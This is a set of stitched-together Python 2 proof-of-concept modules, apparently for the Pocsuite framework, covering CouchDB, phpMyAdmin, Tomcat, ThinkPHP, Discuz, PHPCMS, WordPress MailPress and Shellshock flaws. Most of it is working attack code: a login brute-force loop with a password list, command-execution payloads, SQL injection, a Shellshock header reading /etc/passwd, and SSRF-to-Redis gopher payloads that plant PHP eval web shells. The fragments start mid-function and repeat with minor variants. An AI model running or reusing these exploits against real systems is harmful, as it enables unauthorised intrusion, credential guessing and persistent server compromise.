if r.status_code in [200, 300, 202]:
#print u"存在漏洞",targetURL
# payload_url.append(targetURL)
payload_dict[targetURL] = r.text
except Exception, e:
pass
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = '5984'
#检测漏洞
url = 'http://%s:%s/_config/' % (_host, _port)
try:
req_code = req.get(url,
timeout=5,
allow_redirects=True,
verify=False).status_code
# print req_code
if req_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = url
except Exception as e:
# return host
print e
pass
print '[+]26 poc done'
return self.save_output(result)
def _verify(self, verify=True):
result = {}
url_list = [self.url]
flag_list = ['src=\"navigation.php', 'frameborder=\"0\" id=\"frame_content\"', 'id=\"li_server_type\">',
'class=\"disableAjax\" title=']
if "phpmyadmin" not in self.url.lower():
url_list.append(self.url + "/phpmyadmin/index.php")
username_list = ['admin', 'root', 'test']
password_list = ["", '123456789', 'a123456', '123456', 'a123456789', '1234567890', 'woaini1314', 'qwerasdf',
'abc123456', '123456a', '123456789a', '147258369', 'zxcvbnm', '987654321', 'qwer!@#$',
'abc123', '123456789.', '5201314520', 'q123456', '123456abc', '123123123', '123456.',
'0123456789', 'asd123456', 'aa123456', 'q123456789', '!QAZ@WSX', '1qaz2wsx']
for url in url_list:
try:
f_res = req.get(url, timeout=5)
if "pma_password" in f_res.content and 'phpMyAdmin' in f_res.content:
for username in username_list:
for password in password_list:
payload = {'pma_username': username, 'pma_password': password}
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
res = req.post(url, headers=headers, data=payload, timeout=5)
for flag in flag_list:
if flag in res.content and res.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = url
result['VerifyInfo']['status_code'] = res.status_code
result['VerifyInfo']['username'] = username
result['VerifyInfo']['password'] = password
result['username'] = username
result['password'] = password
return self.parse_attack(result)
except Exception as e:
raise e
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#获取处理后的url
vul_url = self.host_port(vul_url)
#定义poc路径和payload
poc_path = urlparse.urljoin(vul_url, "test.txt")
payload = "this is Vulnerable cve201712617!"
#检测漏洞
try:
#print urlparse.urljoin(vul_url,poc_name)
poc_req = req.put(url=poc_path, data=payload, verify=False)
#print poc_req.content
poc_content = req.get(url=poc_path).content
#print poc_content
if 'cve201712617' in poc_content:
#print u'\n【警告】' + vul_url + "【存在漏洞】"
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = poc_path
result['VerifyInfo']['Payload'] = payload
else:
#print u'\n【不存在漏洞】 ' + vul_url
pass
except:
# return vul_url
pass
print '[+]18 poc done'
return self.save_output(result)
def _verify(self):
# 调用指纹方法
result={}
#如果设置端口则取端口,没有设置则为默认端口
import re
import socket
import time
vul_url = "%s"%self.url
# from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = int(url2ip(vul_url)[1])
else :
_host = url2ip(vul_url)
_port = 80
#判断端口是否开放
import socket
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.settimeout(1)
try:
sk.connect((_host,_port))
#print 'Server port is OK!'
except Exception:
return self.save_output(result)
sk.close()
vul_ip = "http://%s:%s/" % (_host, _port)
payloads=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
"index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
"index.php?s=index/\\think\Request/input&filter=printf&data=ads3234asdg34ggasda222",
"index.php?s=index/\\think\\view\driver\Php/display&content=<?php printf 'ads3234asdg34ggasda222';?>",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222"]
payloads2=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
"index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
"index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir",
"index.php?s=index/\\think\\view\driver\Php/display&content=<?php phpinfo();?>",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
"index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir"]
for p in payloads2:
url=vul_ip+p
try:
text = req.get(url,timeout=4).text
if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = p
return self.save_output(result)
except Exception as e:
print e
pass
return self.save_output(result)
def _attack(self):
result = {}
payload = ('gopher://127.0.0.1:6379/'
'_eval "local t=redis.call(\'keys\',\'*_setting\');'
'for i,v in ipairs(t) do redis.call(\'set\',v,'
'\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'
'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'
's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'
'a:1:{s:7:\\\"plugins\\\";s:32:\\\"system(base64_decode($_GET[c]));\\\";}}}'
's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'
' end;return 1;" 0 %250D%250Aquit')
vul_url = self.url + payload
req.get(vul_url)
web_url = self.url.rpartition('/')
while web_url[2] != urlparse.urlparse(self.url).netloc:
shell_url = web_url[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
rep = req.get(shell_url)
if rep.status_code == 200:
# 该文件作为一句话的话payload会被拦截,且flush后shell会掉,所以用命令马向当前目录写入一句话
flag = ''.join([random.choice(string.digits) for _ in range(8)])
shell_flag = ''.join([random.choice(string.lowercase) for _ in range(8)])
shell_payload = 'echo \'<?php @eval($_POST[c]);echo "' + flag + '";?>\' > ' + shell_flag + '.php'
shell_payload_b64 = base64.b64encode(shell_payload)
req.get(shell_url + '&c=' + shell_payload_b64)
shell_url = web_url[0] + '/' + shell_flag + '.php'
rep = req.get(shell_url)
if rep.status_code == 200 and flag in rep.content:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = shell_url
result['ShellInfo']['Content'] = '@eval($_POST[c]);'
# 验证后恢复,避免网站无法访问
payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
recover_url = self.url + payload_flush
req.get(recover_url)
req.get(web_url[0] + '/forum.php')
break
web_url = web_url[0].rpartition('/')
return self.parse_output(result)
def _attack(self):
result = {}
url_part = self.url.rpartition('/')
payload = ('gopher://127.0.0.1:6379/xeval '
'"local t=redis.call(\'keys\',\'*_setting\');'
'for i,v in ipairs(t) do redis.call(\'set\',v,'
'\'a:2:{s:6:\\"output\\";a:1:{s:4:\\"preg\\";'
'a:2:{s:6:\\"search\\";a:1:{s:7:\\"plugins\\";'
's:5:\\"/^./e\\";}s:7:\\"replace\\";a:1:{s:7:\\"plugins\\";'
's:40:\\"system(base64_decode($_GET[dshtanger]));\\";}}}'
's:13:\\"rewritestatus\\";a:1:{s:7:\\"plugins\\";i:1;}}\') end;'
'return 1;" 0 %250D%250Aquit')
target_url = self.url + payload
vul_rep = req.get(target_url)
while vul_rep.status_code == 200:
shell_url = url_part[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
shell_rep = req.get(shell_url)
if shell_rep.status_code == 200:
random_sed = string.letters+string.digits
flag = ''.join([random.choice(random_sed) for _ in range(8)])
shell_flag = ''.join([random.choice(random_sed) for _ in range(8)])
#use system() write a shell php file and shell will retained after flushing redis apache
shell_payload = 'echo \'<?php @eval($_POST[dshtanger]);echo "' + flag + '";?>\' > ' + shell_flag + '.php'
shell_payload_b64 = base64.b64encode(shell_payload)
#write a random php file
req.get(shell_url + '&dshtanger=' + shell_payload_b64)
#access this php file
verify_url = url_part[0] + '/' + shell_flag + '.php'
verify_rep = req.get(verify_url)
if (verify_rep.status_code == 200) and ( flag in verify_rep.content):
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = verify_url
result['ShellInfo']['Content'] = '@eval($_POST[dshtanger]);'
#recover website
flush_payload = 'gopher://127.0.0.1:6379/xflushall%0D%0Aquit'
flush_url = self.url + flush_payload
req.get(flush_url)
test_url = url_part[0] + '/forum.php'
req.get(test_url)
break
return self.parse_output(result)
def _verify(self):
result = {}
vulurl = "%s/index.php?m=wap&c=index&a=comment_list&commentid=content_12" % self.url
payload = "%2527%20or%20updatexml(1,concat(0x7e7e7e,version(),0x7e7e7e)),0)%23-84-1"
resp = req.get(vulurl+payload)
re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I)
if re_result:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def _verify(self):
result = {}
header = {
'User-Agent': '() { :; }; echo; /bin/cat /etc/passwd'
}
res = req.get("%s/tarantella/cgi-bin/modules.cgi" % self.url, headers = header)
if 'root:x:0:0:root:' in res.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['Url'] = self.url
result['VerifyInfo']['PostData'] = '() { :; }; echo; /bin/cat /etc/passwd'
return self.parse_output(result)
def _attack(self):
result = {}
ssrf_url = "ssrf.php?ssrf=" #对应dz文件
payload = ('gopher://127.0.0.1:6379/'\
'_eval "local t=redis.call(\'keys\',\'*_setting\');'\
'for i,v in ipairs(t) do redis.call(\'set\',v,'\
'\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
'a:1:{s:7:\\\"plugins\\\";s:34:\\\"eval(base64_decode(\$_REQUEST[a]));\\\";}}}'\
's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
' end;return 1;" 0 %250D%250Aquit')
web_url = self.url.rpartition('/')
self.url = web_url[0]+ '/' + web_url[2] + '/'
vul_url = self.url + ssrf_url + payload
base_rep = req.get(vul_url)
web_url = self.url.rpartition('/')
while base_rep.status_code == 200:
shell_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
rep = req.get(shell_url)
if rep.status_code == 200:
shell_payload = 'file_put_contents("shell.php","<?php @eval(\$_REQUEST[she1l]);?>");'
shell_payload_b64 = base64.b64encode(shell_payload)
attack_url= shell_url + '&a=' + shell_payload_b64
req.get(attack_url)
flag = "phpinfo";
shell_url = web_url[0] + '/' + 'shell.php'
verify_url = shell_url + "?she1l=phpinfo();"
rep = req.get(verify_url)
if rep.status_code == 200 and flag in rep.content:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = shell_url
result['ShellInfo']['Content'] = '@eval($_REQUEST[she1l]);'
#后台内存清理
payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
recover_url = self.url + ssrf_url +payload_flush
req.get(recover_url)
req.get(web_url[0] + '/forum.php')
break
web_url = web_url[0].rpartition('/')
return self.parse_output(result)
return self.parse_output(result)
def resolve_js_redirects(url):
meta_regx = '(?is)\<meta[^<>]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*'
body_regx = '''(?is)\<body[^<>]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*'''
js_regx = '''(?is)<script.*?>[^<>]*?window\.location\.(?:replace|href|assign)[\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?</script>'''
if not url.startswith(('http://', 'https://')):
url = 'http://' + url
res = req.get(url)
true_url = res.url
for regx in [meta_regx, body_regx, js_regx]:
result = re.search(regx, res.text)
if result:
true_url = result.group(1)
break
return true_url
def _verify(self):
result = {}
url_part = self.url.rpartition('/')
random_sed = string.letters+string.digits
flag = ''.join([random.choice(random_sed) for _ in xrange(10)])
payload = "/index.php?app=core&module=system&controller=content&do=find&content_class=cms\\Fields1{}echo%20" + "md5(" + flag + ");/*"
target_url = self.url + payload
target_rep = req.get(target_url)
while target_rep.status_code == 200:
flag_hash = hashlib.md5(flag).hexdigest()
if flag_hash in target_rep.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
break
return self.parse_output(result)
def _verify(self):
###
#!!!!The ssrf_url is one file i put it in discuz for test.
#!!!!One day you find the real ssrf in discuz you can change the ssrf_url to work well;
###
print self.url
ssrf_url = "ssrf_gopher.php?ssrf="
result = {}
#Write your code here
payload = ('gopher://127.0.0.1:6379/'\
'_eval "local t=redis.call(\'keys\',\'*_setting\');'\
'for i,v in ipairs(t) do redis.call(\'set\',v,'\
'\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
'a:1:{s:7:\\\"plugins\\\";s:10:\\\"phpinfo();\\\";}}}'\
's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
' end;return 1;" 0 %250D%250Aquit')
tmpparse = urlparse.urlparse(self.url)
if tmpparse.path != '':
self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
#self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' +(tmpparse.path.split('/')[1],tmpparse.path.split('/')[0])['/' in tmpparse.path]
else:
self.url = tmpparse.scheme + '://'+ tmpparse.netloc
vul_url = self.url + '/' + ssrf_url + payload
base_rep = req.get(vul_url)
while base_rep.status_code == 200:
verify_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
rep = req.get(verify_url)
flag = 'phpinfo';
if flag in rep.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = verify_url
payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
recover_url = self.url + '/' +ssrf_url + payload_flush
req.get(recover_url)
req.get(self.url + '/forum.php')
break
return self.parse_output(result)
def _attack(self):
result = {}
flag = ''.join([random.choice(string.digits) for _ in range(8)])
flag_hash = hashlib.md5(flag).hexdigest()
exp_url = "wp-content/plugins/mailpress/mp-includes/action.php"
post_data = {
'action':'autosave',
'id':'0',
'revision':'-1',
'to_list':'1',
'subject':'<?php echo md5('+flag+'); @eval($_REQUEST[shell]);?>',
'mail_format':'standard',
'autosave':'1'
}
tmpparse = urlparse.urlparse(self.url)
if tmpparse.path != '':
self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
else:
self.url = tmpparse.scheme + '://'+ tmpparse.netloc
vul_url = self.url + '/' + exp_url
base_rep = req.post(vul_url,data=post_data)
getid = re.findall(r'<autosave id=\'[\d]*\'',base_rep.content,re.I)
tmpid = getid[0].split("'")[1]
while int(tmpid) > 0:
shell_url = self.url + '/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id='+tmpid
rep = req.get(shell_url)
if flag_hash in rep.content:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = shell_url
result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);'
break
return self.parse_output(result)
def _verify(self):
result = {}
#Write your code here
flag = ''.join([random.choice(string.digits) for _ in range(8)])
payload = ('gopher://127.0.0.1:6379/'
'_eval "local t=redis.call(\'keys\',\'*_setting\');'
'for i,v in ipairs(t) do redis.call(\'set\',v,'
'\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'
'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'
's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'
'a:1:{s:7:\\\"plugins\\\";s:14:\\\"md5(' + flag + ');\\\";}}}'
's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'
' end;return 1;" 0 %250D%250Aquit')
vul_url = self.url + payload
req.get(vul_url)
web_url = self.url.rpartition('/')
while web_url[2] != urlparse.urlparse(self.url).netloc:
poc_url = web_url[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
rep = req.get(poc_url)
flag_hash = hashlib.md5(flag).hexdigest()
if flag_hash in rep.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = poc_url
# 验证后恢复,避免网站无法访问
payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
recover_url = self.url + payload_flush
req.get(recover_url)
req.get(web_url[0] + '/forum.php')
break
web_url = web_url[0].rpartition('/')
return self.parse_output(result)
def _verify(self):
'''
本地搭建ssrf.php,验证PoC
'''
ssrf_url = "ssrf.php?ssrf=" #
result = {}
payload = ('gopher://127.0.0.1:6379/'\
'_eval "local t=redis.call(\'keys\',\'*_setting\');'\
'for i,v in ipairs(t) do redis.call(\'set\',v,'\
'\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
'a:1:{s:7:\\\"plugins\\\";s:10:\\\"phpinfo();\\\";}}}'\
's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
' end;return 1;" 0 %250D%250Aquit')
web_url = self.url.rpartition('/')
self.url = web_url[0]+ '/' + web_url[2] + '/'
vul_url = self.url + ssrf_url + payload
base_rep = req.get(vul_url)
while base_rep.status_code == 200:
verify_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
rep = req.get(verify_url)
flag = 'phpinfo';
if flag in rep.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = verify_url
payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
recover_url = self.url + ssrf_url + payload_flush
req.get(recover_url)
req.get(web_url[0] + '/forum.php')
break
web_url = web_url[0].rpartition('/')
return self.parse_output(result)
def _verify(self):
result = {}
url_part = self.url.rpartition('/')
#ssrf_url = "ssrf_gopher.php?ssrf="
random_sed = string.letters+string.digits
flag = ''.join([random.choice(random_sed) for _ in xrange(16)])
payload = ('gopher://127.0.0.1:6379/xeval '
'"local t=redis.call(\'keys\',\'*_setting\');'
'for i,v in ipairs(t) do redis.call(\'set\',v,'
'\'a:2:{s:6:\\"output\\";a:1:{s:4:\\"preg\\";'
'a:2:{s:6:\\"search\\";a:1:{s:7:\\"plugins\\";'
's:5:\\"/^./e\\";}s:7:\\"replace\\";a:1:{s:7:\\"plugins\\";'
's:22:\\"md5('+ flag +');\\";}}}'
's:13:\\"rewritestatus\\";a:1:{s:7:\\"plugins\\";i:1;}}\') end;'
'return 1;" 0 %250D%250Aquit')
target_url = self.url + payload
target_rep = req.get(target_url)
while target_rep.status_code == 200 :
poc_url = url_part[0] +'/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
poc_rep = req.get(poc_url)
flag_hash = hashlib.md5(flag).hexdigest()
if flag_hash in poc_rep.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = poc_url
#recover website
flush_payload = 'gopher://127.0.0.1:6379/xflushall%0D%0Aquit'
flush_url = self.url + flush_payload
req.get(flush_url)
test_url = url_part[0] + '/forum.php'
req.get(test_url)
break
return self.parse_output(result)
